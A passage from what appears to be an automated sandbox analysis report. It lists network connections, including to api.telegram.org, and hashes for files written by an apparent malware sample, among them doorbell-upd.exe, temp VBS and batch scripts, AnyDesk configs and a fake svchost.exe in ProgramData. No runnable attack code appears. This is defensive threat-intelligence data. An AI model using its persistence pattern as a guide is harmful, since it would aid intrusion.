| N/A | 239.255.102.18:30489 | udp | |
| DE | 18.66.192.109:80 | api.playanext.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:51227 | tcp | |
| FR | 216.58.215.36:443 | www.google.com | udp |
| FR | 216.58.215.36:443 | www.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8294f1821fd3419c0a42b389d19ecfc6 |
| SHA1 | cd4982751377c2904a1d3c58e801fa013ea27533 |
| SHA256 | 92a96c9309023c8b9e1396ff41f7d9d3ff8a3687972e76b9ebd70b04e3bf223a |
| SHA512 | 372d369f7ad1b0e07200d3aa6b2cfce5beafa7a97f63932d4c9b3b01a0e8b7eb39881867f87ded55a9973abea973b2d2c9b6fc4892f81cec644702b9edb1566d |
\??\pipe\LOCAL\crashpad_2040_QLWWWWIQDYUPZTVX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 390187670cb1e0eb022f4f7735263e82 |
| SHA1 | ea1401ccf6bf54e688a0dc9e6946eae7353b26f1 |
| SHA256 | 3e6c56356d6509a3fd4b2403555be55e251f4a962379b29735c1203e57230947 |
| SHA512 | 602f64d74096d4fb7a23b23374603246d42b17cc854835e3b2f4d464997b73f289a3b40eb690e3ee707829d4ff886865e982f72155d96be6bc00166f44878062 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8495e20d6c986f883d365d0ddd04360c |
| SHA1 | f1bb805a124dae224229749e488ec02dff78f198 |
| SHA256 | ab38d5e028d0d4eb07fa6545e0230c666bbb64c5d33c60d01bc46057fa7957ee |
| SHA512 | 34d8ded0db7650be1a7da9ceea578e34ccb27a895b603385b78312875e89ac3cedade426d7269626ef62201898c5aee207b4d13a5c1f3810f2dc8296d6c9c552 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 583213f6c2e5d2492d3a852e1fd51a0c |
| SHA1 | 692e0a489cdb3a4216015b2776f85d8594dcbe77 |
| SHA256 | 67a434716e812286ee21ae0bbe4d2bb3d52bdeec939d9220388e561650b580e4 |
| SHA512 | 293245bd144f56949f9c7569615bc82aced604e790415a5fafdfd33e1e8d239cd26952e2166632aac3bf05e2f945e067198c33e832f2283ab4cc87cf159add83 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d41a8c95c6052636f7e2dc60d3c1a37d |
| SHA1 | 52b98cd3006e2748f281d021bc41a38bedc67022 |
| SHA256 | b8d626c4169bff93f4f732d8198a409f0b13e7d45398fcdf266b11270fa3f8b1 |
| SHA512 | 8a35e56ccdb074d74b09d73816ee19e81798668fe98cfce0f86d6bcb0a4c080304a44c1a0cf5260087e72b0f02fca9381658e4062c2bb609b8ad8427c100aac6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57bde1.TMP
| MD5 | 2fbefa351eba8db5437eea03c31e7a9a |
| SHA1 | 346649e79619b82848d398684583ebb7c709c292 |
| SHA256 | 1272c1df16b7b1025acf9414175a4ea22cb93314b84010d2f6890c4d6f268602 |
| SHA512 | 563e58d4b6a10ea3e739df4d147685e697f93194cb260ce5b2915d8334ea0fa86490071c22c1a59ada3ebba7c5cce0220aadecc5094963b9185f04e35b2baa60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f52063345e20b6962a5487d1cc8627f6 |
| SHA1 | a457e71e540e3501ffadbda389d7b17c612759ed |
| SHA256 | b0d73d4bacf7fb90e94ffbd9b6a8f108373b9fcd0a28f7a1df5838af8647de5c |
| SHA512 | 73cc87a7818d854aa36850b83557d0447c1917a198e026d7385dcf676766a2a2f129422b7b7a96f2c71dfeeef58e2159b60b1912bf0370cf010085662a58f9f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7806cf72f57ee301419845b6270dec35 |
| SHA1 | ea5e13b1b7ccf6acdeffd453b26901e26073e8a4 |
| SHA256 | 12cc69764e4d4c8e4a988dad744c5edcc0a6b8f9d209981d44884ed0dbaa6672 |
| SHA512 | cf3b05ae9fb7116abbefa85486ac74b6f206360c777d8a305c59af9d4a7008de5c9e14fd45b66c6f99655c1c84aead0b0a16038d64e913c5e38210726870d876 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1ebf1391021aad511ba070febf6b358f |
| SHA1 | 893b398796fffba754c86ff2f3ba70369ca25813 |
| SHA256 | ca50f8f074b4b76f012e3f4f55ac6177d2d6b96c05bb4d6d7d91c4b3d128f86c |
| SHA512 | 2f1ee02b1ef8792db382b33900a55d51db56b9f98b425415b73db4ecf93d2c7a82732bc09d0776dbc665cc460823bd79dba37b26c841c6015e2cc8ec035cb9d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 7faa10c299d98d9786a78e096d79c9f1 |
| SHA1 | d8e9f5c26fd952bf760fede6caa86cefe1337c75 |
| SHA256 | f0a17acf2c7c7477efd928b2122448292d515fd4691a65c5da1ebb05f77187f5 |
| SHA512 | 478b6117c2c6419aefac3c9b1521e127ea35f3f0b12323a8b3eb021e4637a03af89e3fff1e1cdc0c7e173c217b5b05a9a4309fffbc51f3af95fd03b9d135997b |
C:\Users\Admin\Downloads\Unconfirmed 790594.crdownload
| MD5 | e10b6631d11b3f4aabb1256da4296588 |
| SHA1 | 2949c1316f6036b3f13d128fb048b78229c49755 |
| SHA256 | 0a2476399914219d49f77018ccaf1412811d1b8464d1bab4057bc1c1763e1ac4 |
| SHA512 | 7ecfe5fc310ebc500a7f7f7136ef5dd886ef7de35d35648a5a0d6f0a12d95c4282ab87b358a1bf151e9f7efeaddc946f5d2b7b357eee24c150baee8761136234 |
C:\Users\Admin\Downloads\Goonscript.exe:Zone.Identifier
| MD5 | f328e184c322cba91dc3c014fe2ef3e9 |
| SHA1 | 2aab1f0a70009051dcc87350e0f3b079da02fbb2 |
| SHA256 | fe25e31061b432c3a3fdd8f797c6dadad253e83dfb305ee997a7302cd70b618d |
| SHA512 | e59501b550ea64155d134ae832812004ec298a44519eb03183542599174b7691be3225f6fa5064d45ed7ec81f0a93721eb8f401d7e2a49c4b91a70ded006c97e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9439364fe21c10e7cf51c9be548f3241 |
| SHA1 | 2a1dd3e3cb1843b13c0256730cf3bc120897126c |
| SHA256 | 82f15d119e4071aad6183be78c320e20eb7335e10870762fb8ae1ad9bbd3a53c |
| SHA512 | 33dce1e6f078d3cc5c593a1ee2d230363281b1c53016a823463e970a4c71762bd82f2878500d4b7aef77f878cca8bb0708b34196f5dd779cb431431d47d9e710 |
C:\Users\Admin\AppData\Local\Temp\A067.tmp\A068.tmp\A079.vbs
| MD5 | d9c7f4fd88a8a0d08f8181c4bfd21b72 |
| SHA1 | 2c72ed965a31bd8b39013b12099b244df58fa8e1 |
| SHA256 | 65537c23d5789c2f574f961f5d34a04391ffffa4ba92a9b448f1946e7ede4a6f |
| SHA512 | f9c23cfb1550be89d1c47109491738e5471b1ed514fde58581f6769ebfd03b97ab32999d8cdb2977e60f1b166c47b2d41cbacbc78718312c638246b5ad04b78b |
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
| MD5 | af75667a7f08a01ae6d7e174922690db |
| SHA1 | bcacd4fc04d1c794dc6ad5b10fc08c4036de8680 |
| SHA256 | 35b7037d72cb861847025ffe8bb5d70eff3e88f544e8c203da2e61c0f5b9ca4d |
| SHA512 | d99b222040fb74650faceaa48543e956ccb48a3483c977b966a2807cf017e4d74f53d8c90ea6139fb3e490949a62a055827a00f3c110d2629cfe34020c9d3d10 |
C:\Users\Admin\AppData\Local\Temp\A365.tmp\A366.tmp\A367.bat
| MD5 | 01a143a4c96cd68edc098eec28b92605 |
| SHA1 | 28d4fb883af2cfcf2fc2690cb548c163fff98732 |
| SHA256 | 8864c3567c339c798f6a46a6dd17ae8f19a1fbac8f523838e926edc6251d79e5 |
| SHA512 | 9ca26669e31d25fd8b1302c9e5bb72e78612fe6158b5c497f8d69895bce81478f06d104d725b3de1767573209d7837d33ce489262c04380e3bda706cae3b4886 |
memory/220-275-0x0000022238F30000-0x0000022238F52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whfytrtt.2h0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\Downloads\AnyDesk.exe
| MD5 | aee6801792d67607f228be8cec8291f9 |
| SHA1 | bf6ba727ff14ca2fddf619f292d56db9d9088066 |
| SHA256 | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 |
| SHA512 | 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f |
memory/2560-288-0x0000000000720000-0x0000000001E69000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6a27e61d703d788737cf92584596b5a2 |
| SHA1 | 108beaaf554bf2f8e028bc9093b8893cecb291eb |
| SHA256 | 0950aff004ff620947dd6068963b5e7f160b94e1156c19f92b6ea5d0370879fc |
| SHA512 | ff154452278aa16a06e3178651a30007ff89c5dda976ff5c5545f620a1a859adda03e25c5cf830ea0b8f24154f79a843d2bbb5ef685d3401136b470bcbe39938 |
memory/4304-304-0x0000000000720000-0x0000000001E69000-memory.dmp
memory/2828-306-0x0000000000720000-0x0000000001E69000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 90c4364822b31bdbe3fa52fa425c112a |
| SHA1 | 23622f215e2da73f70c71c068ddaee556c8a8231 |
| SHA256 | 0a011bc61708cc9369782367d43bc82cb866f94bbf3606240cf4a9136dd072e9 |
| SHA512 | 5b9127355c99feeb93dad5624370b0c2d376d1c810612981b2e0b85b78548c71fd504e2d1f107399ce5e659135d973f215d3716cac78e9cdb61bc0298fc961b1 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | a787c308bd30d6d844e711d7579be552 |
| SHA1 | 473520be4ea56333d11a7a3ff339ddcadfe77791 |
| SHA256 | 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440 |
| SHA512 | da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 1bfa5e296281ceba8e3c55373c6e809a |
| SHA1 | 77faa7ca84ab75ac54f20a418188e9d3b0b53ee9 |
| SHA256 | 9adf1ee72fdb113d1dcc9f2bf9faed45db0026576d01aa268febd8882ec5934e |
| SHA512 | a87e5a7dbd7609259d75a0045dc91c7ce57348630a48263b7efb089a6f3799e2b79022d953fc832f50fc3d3319cb4c3084b00cb630c1e4f0f1ed2a3d6bf603e3 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 0c04ad1083dc5c7c45e3ee2cd344ae38 |
| SHA1 | f1cf190f8ca93000e56d49732e9e827e2554c46f |
| SHA256 | 6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0 |
| SHA512 | 6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 5fad878349e234af5bdfad4c1894b85c |
| SHA1 | f987b069506e27a1cc916ce16400e472d06928b4 |
| SHA256 | f653551efce38076fa80760fa9b564211a521f76f328c1f4146f75889d67a22a |
| SHA512 | 0ba7420d6b78fb25b8ba07b97f1060c1acab63b1fa008f0f20ae18c33346681ead8041f23b99b32be21587e27bbb85a2a02f9ccc1aa3a8eee7aef72df96b2eeb |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | f221e87aa559c4800264bdbd653c4aba |
| SHA1 | c3ca6c2a76b374eba43ead10a9b217c9e69bff73 |
| SHA256 | c016d704c6229686cb4ea3ba973a07ce5097422634d7ea0b678eee7431e78572 |
| SHA512 | 2b1be0167682af0befd9248674146f82958ffca35f6a3ff4a110b831a2b40c8b408feb5fe700bfd49797b326f523c0f85dad7d0d797cb314148f285a9b035ad5 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | ae23851daecaeb21f29b16fe4cb82444 |
| SHA1 | 75342415c05adf338cfeb79fa6eb6af893372b54 |
| SHA256 | c5d50079785d3dbe8bc08bc3162c6348faf3d411027840f350f7d2237c3600c8 |
| SHA512 | da562c0187e0d1a62758a6e80fddde112d29158012811138afda8313041939e4e0cf98c8ed1fb0bc2fd3f9eca3f03252f806486c909ba1cc1711b704462fed85 |
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
| MD5 | a67d6d0e626d0a77d7718161cf79b7bb |
| SHA1 | a5d5d86f7200d7a822c6265207997d96a0b71b84 |
| SHA256 | 4570a014a7c4f15c7a73af9700dd311ddc510bcc7b5a5623f70667c5859fd537 |
| SHA512 | 02fc13c38f048a4940a5ec03e85c9f1171f8f5fa2e61867f38c924e91c9f68857ef809cb7730e5b4907de783d905d891fa38bfad39ee5fbf580a3d07c29ecf35 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 99074bcf2df7414a5b080879fc05673d |
| SHA1 | d5c3f7b0b375d7743064a34afdac0cf14a3c1f02 |
| SHA256 | 03e8cfbb88d5ea5af590f6f28791183fba7a8c81575bf9c300909f5b838aa0b0 |
| SHA512 | d4d47c22c31efe9e0e4d468cc3ec494b26f3d5f8e76357d137c964e813d01356c231bbb5a02a162ce220f32f1c8141f11fa80822f20a2f82dc26ff07e00de9e8 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | a2a175f5480d4fdf42019567fb05daac |
| SHA1 | 5d59556de68cb7fed20e92ca49b963dbfad23a22 |
| SHA256 | b4fb405d6f5fd813f8895b8d0b0008b562cd8ed084a30e6ef861d8fa60fb6b90 |
| SHA512 | 9de55b947876626c2bd133ebe7cf0a094a7444b8aadd740839c80498af36dac1cd850ae2b68add6ec1dd41364a7d87476b32ed93ed526b35057540e94584c7da |
memory/4304-414-0x0000000000720000-0x0000000001E69000-memory.dmp
memory/2828-416-0x0000000000720000-0x0000000001E69000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | afdc4f69f4720b8c4153f6186f49a2b6 |
| SHA1 | 329c27ea36d7913809b0c239bb58e91d2ee468ac |
| SHA256 | 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571 |
| SHA512 | 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de |
memory/2012-433-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | 24660b14f7ccd35b98ef6389f7da7ccd |
| SHA1 | fc295ccc11c1533490fcc5b472fdc790e6e804e1 |
| SHA256 | bb8c6bd9d83d2b727d6dc9a4665995fdd09e01ff4e8e4c0a61450e01a1cc1bcc |
| SHA512 | eb7d9f58028e6bb78a205ca75d3f99803bbe9ebc95eb792e3deb589e92d40e06b2913a01e4a4e38d79a905ee89fc554a4c8d69970aea6c63ce1e1ea41c314f4e |
memory/2560-487-0x0000000000720000-0x0000000001E69000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | 970bab2b404616a4654d7d290983f55a |
| SHA1 | 324860765bda1f57a384f73653d23a323cf743a6 |
| SHA256 | 57a25cbc2f7a6dbeaefeb23b9df44503117c8c49cb8b0f1c476ba55615b884e7 |
| SHA512 | 89bfdad64b4011017df1fe88a29603822b2ed12b6324061ec4f465f77bb54d3615ce35fa9d4b38fe894653e82f8f7f2a71466050a4b3ed6bbae9cc84fe6c1df3 |
memory/2152-535-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 51586df2d350703148f35aa09c706ff8 |
| SHA1 | bc5f45bf6aa95137625de58d538ef19b641ebfc4 |
| SHA256 | 3133ff72a18d5194467efa7937fc58b4b7e6a3cc6cfeada78f109e07fb111f14 |
| SHA512 | a91e9401522b00619024db5c7e50299bcedbf3404874c0597ee0f37dff813755833775584d4c4ec9ac0e876dac0c922b4944788283047220455669675971dff2 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 7044755137e4beaa2b0ac8bde5dd65e3 |
| SHA1 | 5b5a6bac91d97a44e75c19ca5dd43405a0787eb7 |
| SHA256 | da1a4967f89d23eda5515a7ed48eec4d83f23bb125e8bbe36034e154bfd67201 |
| SHA512 | 6f3ad72d9faa4d25605b8ae30fb63198311afb0d4e80f0a60ff7d1cfa9aff85999c2bc6764061fa5a58557ff96935a787ff8a65375161babbf4aa3bf488094d9 |
memory/4012-541-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | cb862df7bedc23b4e32f1f58266f75db |
| SHA1 | ca7999acb1b3e25c018b161bad0edca54d0bf56c |
| SHA256 | b5eeac895117da06089d832aaf823b93981e7466a8c635212a49cb6991b83a79 |
| SHA512 | 7043195d6406ec54ca667af1a3034b6ef86c1b489e3730f91ba1410917d2f74f76e033f80199865c7f1bc00f5fffb3ad54e06d373f6bd85aa17542d6afdbbc20 |
memory/4012-571-0x0000000000190000-0x00000000018D9000-memory.dmp
memory/1476-670-0x0000000000190000-0x00000000018D9000-memory.dmp
memory/1476-691-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4f26ef66e47c7e2f46ffc40e876c9c3e |
| SHA1 | 6e34ae46411302a457fab629e4aeec83e762bd0f |
| SHA256 | 73c173d93bba1e6cbcfa903b0cafee5c7294ed2a7fb367fc8d7f3c9a9a31d21f |
| SHA512 | d67d61dc1d07be26b9afa6b5db9f4c9a068a52f4d57a35e67e59451c1dcf3ae5ec0fdace31b4a9bff1fbcbdaa3830d8c1b5692bd96eebe117d3dd18d73d86723 |
C:\ProgramData\svchost.exe
| MD5 | 1b0a49b12fb2cfc89d01cf29b8d4f875 |
| SHA1 | 2bbf873025c5c95f030de72a8a68d5d2e7b23c3b |
| SHA256 | b6ed5fdbece483fba8c67c52efbc57d77e126b032bd031f4bf68224f5c96459e |
| SHA512 | 94844cbf5c3995d3d719c5d77d1c1ab3a02269d3fbd2ef1822e301bc96441976d53b169ac982015804d28fdb1e52efc59604fed0c90bb196511f70039947fe86 |
memory/2012-794-0x0000000000190000-0x00000000018D9000-memory.dmp
memory/1396-838-0x00007FFD9F280000-0x00007FFD9F291000-memory.dmp
memory/1396-842-0x00007FFD9E450000-0x00007FFD9E461000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7fadebde6c0f9438075b81bf5fafa4d4 |
| SHA1 | e5629e27e536f4a4aa53e3d84a1e8a20b29497a3 |
| SHA256 | f13566861d9dc2c3c1e988a58a101083bf4dbfdf96642498e447f2ec282e04d1 |
| SHA512 | e97cdf6f93e26fe555a42a6ccb13dbbfa7e95084acfd0775f5b0b87c28f0832ff0ce46c20a658308d930c489a5cb19e96e4eca43892e89ee141234578e710b5b |
memory/1396-871-0x00007FFD93A20000-0x00007FFD93A31000-memory.dmp
memory/1396-875-0x00007FFD8BB30000-0x00007FFD8BBAC000-memory.dmp
memory/1396-844-0x000002762E190000-0x000002762F240000-memory.dmp
memory/2152-806-0x0000000000190000-0x00000000018D9000-memory.dmp
memory/1396-877-0x00007FFD93890000-0x00007FFD938A8000-memory.dmp
memory/1396-876-0x00007FFD938B0000-0x00007FFD938C1000-memory.dmp
memory/1396-874-0x00007FFD8C1B0000-0x00007FFD8C217000-memory.dmp
memory/1396-873-0x00007FFD938D0000-0x00007FFD93900000-memory.dmp
memory/1396-872-0x00007FFD93A00000-0x00007FFD93A18000-memory.dmp
memory/1396-870-0x00007FFD99940000-0x00007FFD9995B000-memory.dmp
memory/1396-869-0x00007FFD9B5B0000-0x00007FFD9B5C1000-memory.dmp
memory/1396-868-0x00007FFD9B5D0000-0x00007FFD9B5E1000-memory.dmp
memory/1396-867-0x00007FFD9DB00000-0x00007FFD9DB11000-memory.dmp
memory/1396-865-0x00007FFD9BBD0000-0x00007FFD9BBF1000-memory.dmp
memory/1396-866-0x00007FFD9E220000-0x00007FFD9E238000-memory.dmp
memory/1396-864-0x00007FFD99780000-0x00007FFD997C1000-memory.dmp
memory/1396-831-0x00007FF6A6D60000-0x00007FF6A6E58000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cd6e57aaadf01b1fa5fc65a3d3140df6 |
| SHA1 | ec2792bbc53cdbc0d2b08d076c7c8b8da6f0d8b2 |
| SHA256 | c208b71e1247aa9c53fb26af12100c8e6f1b3a693728875feaf4cd280ae1f6d7 |
| SHA512 | 5dee083398f67dfa115cfb9407b31256a8ac6039cf46f4d2a92c135096bb08bcea7ad6e1b434dbbf64541aa5186868e14ad31d08f1b35d31317dfe011cbd698f |
memory/1396-843-0x00007FFD8B230000-0x00007FFD8B43B000-memory.dmp
memory/1396-833-0x00007FFD8C220000-0x00007FFD8C4D6000-memory.dmp
memory/1396-841-0x00007FFD9E600000-0x00007FFD9E61D000-memory.dmp
memory/1396-839-0x00007FFD9E790000-0x00007FFD9E7A7000-memory.dmp
memory/1396-840-0x00007FFD9E710000-0x00007FFD9E721000-memory.dmp
memory/1396-836-0x00007FFDA2DD0000-0x00007FFDA2DE8000-memory.dmp
memory/1396-837-0x00007FFD9F690000-0x00007FFD9F6A7000-memory.dmp
memory/1396-832-0x00007FFD9E7B0000-0x00007FFD9E7E4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 589725aab9f6e8ed1dab1e74f78f9e29 |
| SHA1 | 849654ab0c07d7caf265ba3caa7e90a36df5520f |
| SHA256 | a24908be028b5810204e9d20544b62621ed79186590065e0a9743d5250431391 |
| SHA512 | 6e7724b5a05e81c93832f43ad4d2018bdce3053f4b8c9828bb1b728398ffd87137826ba0803a00e5d8545dc6cefc15350cfc9efff4d924681f7786891efafc20 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
memory/2012-1001-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | cde6b28265022f5a56ba56ecf1d7913c |
| SHA1 | b5a3c617ce025d5719d958f3a53fd9f9e22adef1 |
| SHA256 | 96136d63c8f5067302be813aa5dced5c958412df6c4ebb8ba21def471f9b54ef |
| SHA512 | 5585785e55b253efec82e095a42e70d72a7177780dc96ef71ef65e290dae3a440bac6c792704cd6fd2a38e7c781015cd3f1c7879b02e9d9e6d3db7fb563272e0 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | 47ca541c198967f7b063c288238e7efd |
| SHA1 | a28762caffc431ba4ec28741a1258bebf7ff7661 |
| SHA256 | a6771034463e0e16dd91e98892e04afd876f95afd2187bb2df3a346332333a98 |
| SHA512 | 67d58135e8c62c91f75795a45480266eea43eb2141a82fc6fb5549fa851ae0663651b40c6846736c596c7d2db6266414803ae89ed1dbfebbab7f71084a332234 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d51fc0c3a9cbfb3f9f336c3cb2a097d1 |
| SHA1 | 681262cc0cdb19ca221ea187a9a2b5d190d4e4ba |
| SHA256 | d3481732dcd459a51870a82d6f8eec2aa9528d50cbc3aa3bd839256322fed788 |
| SHA512 | 27b95280487c8425d1bb2f4a428b44ddf4d479bec240024a6d6c1976b297b05b325d2b3dd5d9ca3bf61617f821a882ff771945843feb6462accd1d4fd962177c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 54ccead015c9f3f3c251e0110d59f481 |
| SHA1 | 564844c495d881f85496117a083345da30474fca |
| SHA256 | b5c833e2abf9605c5e16873bed13219e5f37cb5c1361f747813855e27ae37587 |
| SHA512 | 61995ff2ef02dba17fecac34caef120957b44ed6d19d7bf4b58b94b1883d2ed61afbb4a7f9e3f5feac7aeebd6e51c26379d53897a449bdb6e6ccc7a1213b6375 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c19471e9d99ad411d02d3f3aaf398770 |
| SHA1 | 16118afdd07a90510f55046a03da78fd46037e52 |
| SHA256 | a5740e98892afa5adebeb789f0308c2a125f8b00cb96c89d73470f0666c35ced |
| SHA512 | dae34079ccbe81a955e5e1cae72c2ecda4dde4c054819ea90ac2f667fe144f1aa42572d9048b40e4a3ea6a87f3e44b9a4195b01847a521c82bcc95b877d11c0f |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | a64b2f3501e8ec53af493e78eea4d95e |
| SHA1 | 31da414b9f60da19cce23ce734d6ef68576b0114 |
| SHA256 | 4efaed1345b472f25c81357d15d5dc6658683e3cfd012e6dd1dbe7a57b780c58 |
| SHA512 | 0aa299ff355feca39e8dd99f8596cbfb65037377e8b8fe31608eb652d5c2ce5d0db1f58bef16edabd81ba0b59a2eca830ca1fe2524a381a2fd947fb413e77885 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | c8f13c2c08e31581d192aee352f9694d |
| SHA1 | 4d49f2cf76b8f2c918c4c8d7b9b1cbdf75bd68fb |
| SHA256 | f723989b93dee3cd0e00da7699ab84f9581ccf67d72cc6af7aaea7e1e91acded |
| SHA512 | 58c81306e77187c1919de4dd3414c82bdcd6de9dda8edce24a128be161e82e906ef64f733a6d354c02645cf5cb1132eb015d70c2b9b5aa0b91f7383c9ffa047b |